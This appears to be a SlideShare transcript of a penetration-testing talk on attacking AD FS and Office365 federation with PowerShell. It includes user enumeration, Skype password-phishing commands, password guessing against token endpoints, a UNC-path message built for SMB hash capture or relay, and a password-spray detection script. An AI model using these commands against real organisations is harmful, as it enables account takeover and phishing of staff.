Attacking ADFS Endpoints with PowerShell
Karl Fosaaen
Introductions
• Who am I?
‒Karl Fosaaen
• What do I do?
‒Wear lots of hats
‒Pen Testing
‒Password Cracking
‒Social Engineering
‒Blog
‒DEF CON Swag Goon
‒Pinball Repair
Introductions
• Hacker Jeopardy Champion
Slides Overview
• ADFS Overview
• Attack Walkthroughs
‒ Identifying Federated Endpoints
‒ Setting Up Your Test Environment
‒ User Enumeration
‒ Email Validation and Social Engineering Recon
‒ Skype Message Phishing
‒ Dictionary Attacks Against Federated Accounts
‒ Enumeration of Other Federated Domain Users
‒ Pivoting to the Internal Network
• Attack Mitigations
• Conclusions/Questions
ADFS Overview
ADFS Overview
Active Directory Federation Services (AD FS)
“is a standards-based service that allows the
secure sharing of identity information
between trusted business partners (known
as a federation) across an extranet.”
Source:
https://msdn.microsoft.com/en-us/library/bb897402.aspx
ADFS Overview
Some Terms:
‒ IdP
‒ SAML
‒ WS-Federation
‒ WS-Trust
‒ ADAL
ADFS Overview
Federation can mean many things
‒ Domain to Domain
‒ Domain to Microsoft
‒ Arbitrary meanings based off of forum posts
ADFS Overview
Frequently Federated Services
• Office365
• Skype for Business
• Exchange
• Azure AD
• SharePoint
• Apps in General
Attack Walkthroughs
• Identifying Federated Endpoints
• Setting Up Your Test Environment
• User Enumeration
• Email Validation and Social Engineering Recon
• Skype Message Phishing
• Dictionary Attacks Against Federated Accounts
• Enumeration of Other Federated Domain Users
• Pivoting to the Internal Network
Identifying Federated Endpoints
Identifying Federated Endpoints
Side Note:
• Office365 had an Authentication Bypass issue
‒ Insecure SAML assertions
‒ Affected all federated Office365 domains
‒ They called out this method in their blog post
Source:
http://www.economyofmechanism.com/office365-authbypass.html
Identifying Federated Endpoints
• Using Microsoft Online
Identifying Federated Endpoints
• Example user check request
Identifying Federated Endpoints
• Microsoft’s Responses
‒ Federated Domain
‒ Microsoft Managed Domain
ADFS Overview
Diagram of (Managed) O365 federation
ADFS Overview
Diagram of (Federated) O365 federation
Identifying Federated Endpoints
• Let’s wrap it in a PowerShell script
‒ Federated Domain
‒ Microsoft Managed Domain
https://blog.netspi.com/using-powershell-identify-federated-domains/
https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints
• Multiple domains at once
https://blog.netspi.com/using-powershell-identify-federated-domains/
https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints
• Using DNS TXT records
Identifying Federated Endpoints
• Using DNS TXT records
• Look for the MS=* records
Identifying Federated Endpoints
• What about the top 1 million Alexa sites?
‒ 47,455 (4.7%) of the top 1 Million have
“ms=ms*” records
• DNS can be a pain at a million records
*Still better than a million HTTP requests to Microsoft
• Other options
‒ ADFS.domain.com
‒ STS.domain.com
Setting Up Your Test Environment
Setting Up Your Test Environment
• Basic Overview
‒ Buy/Have a domain
‒ Set up/Purchase Skype for Business*
‒ Install Skype for Business Client*
‒ Install Lync 2013 SDK*
‒ Get the NetSPI PowerShell Modules
‒ Install Azure AD PowerShell module
*Note: This is only needed for testing federated Skype for Business
Setting Up Your Test Environment
• Buy your domain
Setting Up Your Test Environment
• Get hosted Office365 services
‒ Or set up your own server
Setting Up Your Test Environment
• Add your domain to the Office365 portal
Setting Up Your Test Environment
• Set up your user and enable federation
Setting Up Your Test Environment
• Install Skype for Business and the Lync SDK
‒ Requires Visual Studio 2010 for the easiest
install
https://www.microsoft.com/en-us/download/details.aspx?id=36824
Setting Up Your Test Environment
• Log in to Skype for Business as your user
Setting Up Your Test Environment
• Grab the PowerShell modules from NetSPI
• https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1
• https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Setting Up Your Test Environment
• Install the Azure AD PowerShell Module
• https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
User Enumeration
User Enumeration
• We have:
‒ Some Targets/Endpoints
‒ A testing environment
• We need:
‒ Some users to attack
• Enumerate some users for the organization
off of LinkedIn
• Use one of the many recon frameworks
• Check out the User enumeration work that
nyxgeek spoke about on Friday
Email Validation and Social Engineering Recon
Email Validation and SE Recon
• Using our federated Skype, we can find
information about other federated Skype
users
• Just open a chat with them
Email Validation and SE Recon
• Or we can just chat with these CEOs
Email Validation and SE Recon
• Let’s just wrap it with PowerShell instead
Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
Email Validation and SE Recon
Email Validation and SE Recon
Demo
• Get-SkypeStatus -inputFile "C:\Temp\LiveAdmins.txt" | ft -AutoSize
• It helps if we run it a couple of times…
Email Validation and SE Recon
Email Validation and SE Recon
• What about the top 1 million Alexa sites
• Of those 47,455 “ms=ms*” records
‒ 45 have “Administrator” accounts that have
federated Skype for Business accounts
‒ None of those were actively online during testing…
‒ From nyxgeek:
• 38,658 (3.8%) have hostname
http://lyncdiscover.domain.com
• 486 of 995 unique (Fortune 1000 - 2015) domain
names
• Note:
‒ Skype doesn’t like opening 2,000+ conversations at a time
Skype Message Phishing
Skype Message Phishing
Send-SkypeMessage `
-email test@example.com `
-message "What's your password?"
Get-SkypeStatus -inputFile 'C:\Emails.txt' |
Select Email,Status |
where Status -Match "Available" |
select Email | Send-SkypeMessage …
Email Validation and SE Recon
Demo
• Get-SkypeStatus -email karl.fosaaen@netspi.com
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello from Derbycon"
• for ($i = 0; $i -lt 10; $i++){Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello $i"}
Email Validation and SE Recon
Email Validation and SE Recon
Email Validation and SE Recon
Demo
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "\\192.168.1.123\test"
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "www.microsoftsupport.online"
• SMB capture/relay running on internal network
• UNC works on internal, HRefs work for external
• Send this message out to a group, get or relay hashes
Skype Message Phishing
• Further Work
‒ Grab a domain's worth of phone numbers
• Got this working while making these slides…
• Should work if you already have creds
‒ Brute-Forcing Skype Creds
• Not easy with the Lync SDK
• Nyxgeek has some great methods that will be
added to PowerSkype
Dictionary Attacks Against Federated Accounts
Dictionary Attacks Against ADFS
• Get-ADFSEndpoint gives us the appropriate
command to run for the domain
‒ Federated Domain
Dictionary Attacks Against ADFS
• Invoke-ADFSSecurityTokenRequest*
Invoke-ADFSSecurityTokenRequest `
-ClientCredentialType UserName `
-ADFSBaseUri https://adfs.example.com/ `
-AppliesTo https://adfs.example.com/adfs/services/trust/13/usernamemixed `
-UserName 'karl.fosaaen' `
-Password 'Winter2016' `
-Domain 'example.com' `
-OutputType Token `
-SAMLVersion 2 `
-IgnoreCertificateErrors
https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security-token-with-powershell/
Dictionary Attacks Against ADFS
• Get-ADFSEndpoint gives us the appropriate
command to run for the domain
‒ Microsoft Managed Domain
Dictionary Attacks Against ADFS
• Connect-msolservice – AzureAD PS Module
Enumeration of Other Federated Domain Users
Enumeration of Other Domain Users
• Not totally necessary, but it can be handy
1. $msolcred = get-credential
2. connect-msolservice -credential $msolcred
3. Get-MsolUser -All | ft -AutoSize
• This also works for apps using AzureAD for
account management
Enumeration of Other Domain Users
• Using the Graph API
Enumeration of Other Domain Users
• Using the Graph API
$token = Get-GraphAPIToken -TenantName DOMAIN_GOES_HERE
Get-GraphData -Token $token -Tenant DOMAIN_GOES_HERE -Resource users
‒ This works for federated and managed domains
• Github – https://github.com/NetSPI/PowerShell/blob/master/Get-GraphAPIToken.ps1
Enumeration of Other Domain Users
Demo
• $token = Get-GraphAPIToken -TenantName microsoftsupport.online
• Get-GraphData -Token $token -Tenant microsoftsupport.online -Resource users
Enumeration of Other Domain Users
Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains
• If the domain uses Office365, you can connect
to it with PowerShell
Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains (1/2)
$PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "test@example.com", $PWord
Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains that have OWA tied to O365 (2/2)
Invoke-Command `
-ConfigurationName Microsoft.Exchange `
-ConnectionUri https://outlook.office365.com/powershell-liveid/ `
-Credential $Credentials `
-Authentication Basic -AllowRedirection `
-ScriptBlock {Get-Recipient -ResultSize unlimited} |
Export-CSV c:\temp\email_users.csv -NoTypeInformation
Enumeration of Other Domain Users
Pivoting to the Internal Network
Pivoting to the Internal Network
• Single Factor VPN Example
‒ Enumerated user emails on LinkedIn
‒ Guessed passwords against MSOnline with
PowerShell
‒ Enumerated VPN interfaces
‒ Logged in with guessed credentials
‒ GPP -> Local admin on DA system
‒ DCSync
• “Store passwords using reversible encryption”
Pivoting to the Internal Network
• Other Routes
‒ Single Factor Services
• Management Protocols
• RDP
• SSH
• Sharepoint
• Terminal Services – Web Based
• Citrix
• VDI
• Etc.
Pivoting to the Internal Network
• Malicious OneDrive Documents
‒ Can’t use macros in the online version of Excel
Pivoting to the Internal Network
• Malicious SharePoint Documents
‒ Same concept as OneDrive, just a different
platform
‒ Backdoor a document
‒ Edit pages
Pivoting to the Internal Network
• Send messages from OWA or Skype for
Business
‒ Autodiscover is handy
‒ People will trust their co-workers
• “Can you look over this word doc for me?”
Pivoting to the Internal Network
• Attacking Email Accounts
‒ If Autodiscover is enabled, adding an account
can be done from anywhere
‒ Email is interesting, but I’d like a shell
‒ This cannot be done programmatically with
PowerShell (*Easily)
‒ “Malicious Outlook Rules”
• Nick Landers – Silent Break Security
‒ “MAPI over HTTP and Mailrule Pwnage”
• Etienne - sensepost
Attack Mitigations
Attack Mitigations
• Enable Dual factor authentication for
external endpoints*
*On all channels
Attack Mitigations
• Limit federation to trusted domains
• Limit exposed services surface area
• Monitor your Federated and Azure endpoints
• Enforce strong password requirements
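Added example (not from the original slides or from NetSPI's tooling): one way to act on the "Monitor your Federated and Azure endpoints" item is to look for a single source that fails sign-in against many distinct accounts in a short window, which is the footprint the dictionary attacks described earlier leave behind. The function name Find-SprayCandidate, the record fields (Time, User, ClientIp, Result) and the sample rows are constructed assumptions, not a real AD FS or Azure AD log schema.

```powershell
# Constructed sample sign-in records (not real log data). The column names are
# assumptions for this example; map them from whatever your AD FS audit events
# or Azure AD sign-in export actually provides.
$sampleCsv = @'
Time,User,ClientIp,Result
2016-09-24T14:00:05Z,alice@example.com,203.0.113.10,Failure
2016-09-24T14:00:09Z,bob@example.com,203.0.113.10,Failure
2016-09-24T14:00:14Z,carol@example.com,203.0.113.10,Failure
2016-09-24T14:00:20Z,dave@example.com,203.0.113.10,Failure
2016-09-24T14:00:26Z,erin@example.com,203.0.113.10,Failure
2016-09-24T14:00:31Z,frank@example.com,203.0.113.10,Success
2016-09-24T14:02:00Z,grace@example.com,198.51.100.7,Failure
2016-09-24T14:02:30Z,grace@example.com,198.51.100.7,Failure
2016-09-24T14:03:10Z,grace@example.com,198.51.100.7,Success
'@

function Find-SprayCandidate {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [object[]] $SignIn,
        [int] $MinDistinctUsers = 5,   # distinct accounts failed against
        [int] $WindowMinutes    = 10   # ...within this many minutes
    )

    # Normalise: parse timestamps as UTC and lower-case account names.
    $rows = foreach ($r in $SignIn) {
        [pscustomobject]@{
            Time     = [datetimeoffset]::Parse($r.Time, [cultureinfo]::InvariantCulture).UtcDateTime
            User     = $r.User.ToLowerInvariant()
            ClientIp = $r.ClientIp
            Result   = $r.Result
        }
    }

    foreach ($src in ($rows | Group-Object -Property ClientIp)) {
        $fails = @($src.Group | Where-Object Result -eq 'Failure' | Sort-Object Time)
        if ($fails.Count -eq 0) { continue }

        # Sliding window over this source's failures: find the largest number of
        # distinct accounts it failed against within $WindowMinutes.
        $start = 0; $best = 0; $bestFrom = $null; $bestTo = $null
        for ($end = 0; $end -lt $fails.Count; $end++) {
            while (($fails[$end].Time - $fails[$start].Time).TotalMinutes -gt $WindowMinutes) {
                $start++
            }
            $distinct = @($fails[$start..$end].User | Sort-Object -Unique).Count
            if ($distinct -gt $best) {
                $best = $distinct
                $bestFrom = $fails[$start].Time
                $bestTo = $fails[$end].Time
            }
        }
        if ($best -lt $MinDistinctUsers) { continue }

        # A success from a flagged source deserves a look: a guess may have landed.
        $hits = @($src.Group | Where-Object Result -eq 'Success' |
                  Select-Object -ExpandProperty User | Sort-Object -Unique)

        [pscustomobject]@{
            ClientIp        = $src.Name
            DistinctTargets = $best
            WindowStart     = $bestFrom
            WindowEnd       = $bestTo
            SuccessfulUsers = $hits -join ', '
        }
    }
}

# A user mistyping their own password (198.51.100.7) stays below the threshold;
# the source touching many accounts (203.0.113.10) is reported.
Find-SprayCandidate -SignIn ($sampleCsv | ConvertFrom-Csv) | Format-Table -AutoSize
```

Grouping by source address alone misses guessing that arrives from many addresses, so pair it with per-account failure counts and tune both thresholds to your normal sign-in volume.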
Thanks!
• My NetSPI Co-workers
‒ QA/Ideas/Suggestions
• My NetSPI Management Team
‒ For giving me time to work on this
• Jared Bird - @jaredbird
‒ For asking me about federation years ago
Questions
Questions?
Karl Fosaaen
@kfosaaen
https://blog.netspi.com
https://github.com/netspi
http://www.slideshare.net/kfosaaen

WIN401_Migrating Microsoft Applications to AWS
 
Cloud Based Rights Management with Azure RMS
Cloud Based Rights Management with Azure RMSCloud Based Rights Management with Azure RMS
Cloud Based Rights Management with Azure RMS
 
01 introduction to entity framework
01   introduction to entity framework01   introduction to entity framework
01 introduction to entity framework
 
01 introduction to entity framework
01   introduction to entity framework01   introduction to entity framework
01 introduction to entity framework
 
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
 
Windows Azure Essentials V3
Windows Azure Essentials V3Windows Azure Essentials V3
Windows Azure Essentials V3
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration Testing
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
It's just Skype for Business - THOTCON
It's just Skype for Business - THOTCONIt's just Skype for Business - THOTCON
It's just Skype for Business - THOTCON
 

Recently uploaded

Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 

Recently uploaded (20)

Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 

Attacking ADFS Endpoints with PowerShell Scripts

  • 1. Attacking ADFS Endpoints with PowerShell Karl Fosaaen
  • 2. Introductions • Who am I? ‒Karl Fosaaen • What do I do? ‒Wear lots of hats ‒Pen Testing ‒Password Cracking ‒Social Engineering ‒Blog ‒DEF CON Swag Goon ‒Pinball Repair
  • 4. Slides Overview • ADFS Overview • Attack Walkthroughs ‒ Identifying Federated Endpoints ‒ Setting Up Your Test Environment ‒ User Enumeration ‒ Email Validation and Social Engineering Recon ‒ Skype Message Phishing ‒ Dictionary Attacks Against Federated Accounts ‒ Enumeration of Other Federated Domain Users ‒ Pivoting to the Internal Network • Attack Mitigations • Conclusions/Questions
  • 6. ADFS Overview Active Directory Federation Services (AD FS) “is a standards-based service that allows the secure sharing of identity information between trusted business partners (known as a federation) across an extranet.” Source: https://msdn.microsoft.com/en-us/library/bb897402.aspx
  • 7. ADFS Overview Some Terms: ‒ IdP ‒ SAML ‒ WS-Federation ‒ WS-Trust ‒ ADAL
  • 8. ADFS Overview Federation can mean many things ‒ Domain to Domain ‒ Domain to Microsoft ‒ Arbitrary meanings based off of forum posts
  • 9. ADFS Overview Frequently Federated Services • Office365 • Skype for Business • Exchange • Azure AD • SharePoint • Apps in General
  • 10. Attack Walkthroughs • Identifying Federated Endpoints • Setting Up Your Test Environment • User Enumeration • Email Validation and Social Engineering Recon • Skype Message Phishing • Dictionary Attacks Against Federated Accounts • Enumeration of Other Federated Domain Users • Pivoting to the Internal Network
  • 12. Identifying Federated Endpoints Side Note: • Office365 had an Authentication Bypass issue ‒ Insecure SAML assertions ‒ Affected all federated Office365 domains ‒ They called out this method in their blog post Source: http://www.economyofmechanism.com/office365-authbypass.html
  • 13. Identifying Federated Endpoints • Using Microsoft Online
  • 14. Identifying Federated Endpoints • Example user check request
  • 15. Identifying Federated Endpoints • Microsoft’s Responses ‒ Federated Domain ‒ Microsoft Managed Domain
  • 16. ADFS Overview Diagram of (Managed) O365 federation
  • 17. ADFS Overview Diagram of (Federated) O365 federation
  • 18. Identifying Federated Endpoints • Let’s wrap it in a PowerShell script ‒ Federated Domain ‒ Microsoft Managed Domain https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
  • 19. Identifying Federated Endpoints • Multiple domains at once https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
  • 20. Identifying Federated Endpoints • Using DNS TXT records
  • 21. Identifying Federated Endpoints • Using DNS TXT records • Look for the MS=* records
  • 22. Identifying Federated Endpoints • What about the top 1 million Alexa sites? ‒ 47,455 (4.7%) of the top 1 Million have “ms=ms*” records • DNS can be a pain at a million records *Still better than a million HTTP requests to Microsoft • Other options ‒ ADFS.domain.com ‒ STS.domain.com
  • 23. Setting Up Your Test Environment
  • 24. Setting Up Your Test Environment • Basic Overview ‒ Buy/Have a domain ‒ Set up/Purchase Skype for Business* ‒ Install Skype for Business Client* ‒ Install Lync 2013 SDK* ‒ Get the NetSPI PowerShell Modules ‒ Install Azure AD PowerShell module *Note: This is only needed for testing federated Skype for Business
  • 25. Setting Up Your Test Environment • Buy your domain
  • 26. Setting Up Your Test Environment • Get hosted Office365 services ‒ Or set up your own server
  • 27. Setting Up Your Test Environment • Add your domain to the Office365 portal
  • 28. Setting Up Your Test Environment • Set up your user and enable federation
  • 29. Setting Up Your Test Environment • Install Skype for Business and the Lync SDK ‒ Requires Visual Studio 2010 for the easiest install https://www.microsoft.com/en-us/download/details.aspx?id=36824
  • 30. Setting Up Your Test Environment • Login to Skype for Business as your user
  • 31. Setting Up Your Test Environment • Grab the PowerShell modules from NetSPI • https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1 • https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
  • 32. Setting Up Your Test Environment • Install the Azure AD PowerShell Module • https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
  • 34. User Enumeration • We have: ‒ Some Targets/Endpoints ‒ A testing environment • We need: ‒ Some users to attack • Enumerate some users for the organization off of LinkedIn • Use one of the many recon frameworks • Check out the User enumeration work that nyxgeek spoke about on Friday
  • 36. Email Validation and SE Recon • Using our federated Skype, we can find information about other federated Skype users • Just open a chat with them
  • 37. Email Validation and SE Recon • Or we can just chat with these CEOs
  • 38. Email Validation and SE Recon • Let’s just wrap it with PowerShell instead Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
  • 40. Email Validation and SE Recon Demo • Get-SkypeStatus -inputFile "C:\Temp\LiveAdmins.txt" | ft -AutoSize • It helps if we run it a couple of times…
  • 42. Email Validation and SE Recon • What about the top 1 million Alexa sites • Of those 47,455 “ms=ms*” records ‒ 45 have “Administrator” accounts that have federated Skype for Business accounts ‒ None of those were actively online during testing… ‒ From nyxgeek: • 38,658 (3.8%) have hostname http://lyncdiscover.domain.com • 486 of 995 unique (Fortune 1000 - 2015) domain names • Note: ‒ Skype doesn’t like opening 2,000+ conversations at a time
  • 44. Skype Message Phishing Send-SkypeMessage -email test@example.com -message "What's your password?" Get-SkypeStatus -inputFile 'C:\Emails.txt' | Select Email,Status | where Status -Match "Available" | select Email | Send-SkypeMessage …
  • 45. Email Validation and SE Recon Demo • Get-SkypeStatus -email karl.fosaaen@netspi.com • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello from Derbycon" • for ($i = 0; $i -lt 10; $i++){Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello $i"}
  • 48. Email Validation and SE Recon Demo • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "\\192.168.1.123\test" • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "www.microsoftsupport.online" • SMB capture/relay running on internal network • UNC works on internal, HRefs work for external • Send this message out to a group, get or relay hashes
